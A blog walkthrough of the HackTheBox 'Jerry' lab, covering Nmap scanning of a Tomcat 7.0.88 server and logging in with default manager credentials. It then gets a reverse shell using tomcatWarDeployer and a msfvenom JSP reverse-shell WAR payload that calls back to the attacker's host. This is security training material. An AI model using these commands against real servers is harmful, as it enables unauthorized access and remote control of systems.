HTB Walkthrough : Jerry

Today we are going to solve another HackTheBox machine “jerry” created by mrh4sh . Lab is mainly focus on exploitation of tomcat server .

Level : Easy

Attacking Strategy

  • Network scanning
    • Nmap
  • Recon
    • Tomcat enumeration
  • Exploitation
    • tomcat 7.0.88 exploit
    • Virtual Environment setup
  • Privilege Escalation
  • Manual Exploitation

Walkthrough

IP address : 10.129.1.110

We start our journey by running the Nmap scan against the machine to enumerate the open port and services on machine .

Enumeration

nmap -sC -sV -p- 10.129.1.110 -Pn 

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST
Nmap scan report for 10.129.1.110
Host is up (0.16s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Nmap show the port 8080 port is open on which Apache Tomcat is running and the title also give the information about the version which is 7.0.88 which is exploitable. After doing some google we land to the exploit which you can get from GitHub. .

Exploitation

After reading the exploit and understand the flow of exploit we setup the virtual environment so that we can install pre dependencies to run our exploit.

git clone https://github.com/mgeeky/tomcatWarDeployer.git
virtualenv -p python2 venv
source venv/bin/activate
pip install -r requirements.txt

Once everything is set , we also need the credentials for tomcat server so after google we land on the GitHub page which provides some default credentials after trying some credentials we got it “admin:s3cret”. After successful exploit we got the administrative shell and we collect the flags .

python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Manual Exploit

You can also exploit without the need of tomcatwardeployer script for this we need to create the Metasploit payload and upload on the tomcat server.

Once login to the account , simply go to war file upload section and upload the payload file and deploy it .

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war

Once the payload successfully uploaded we call the payload using the curl and we got the session .

1 thought on “HTB Walkthrough : Jerry”

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.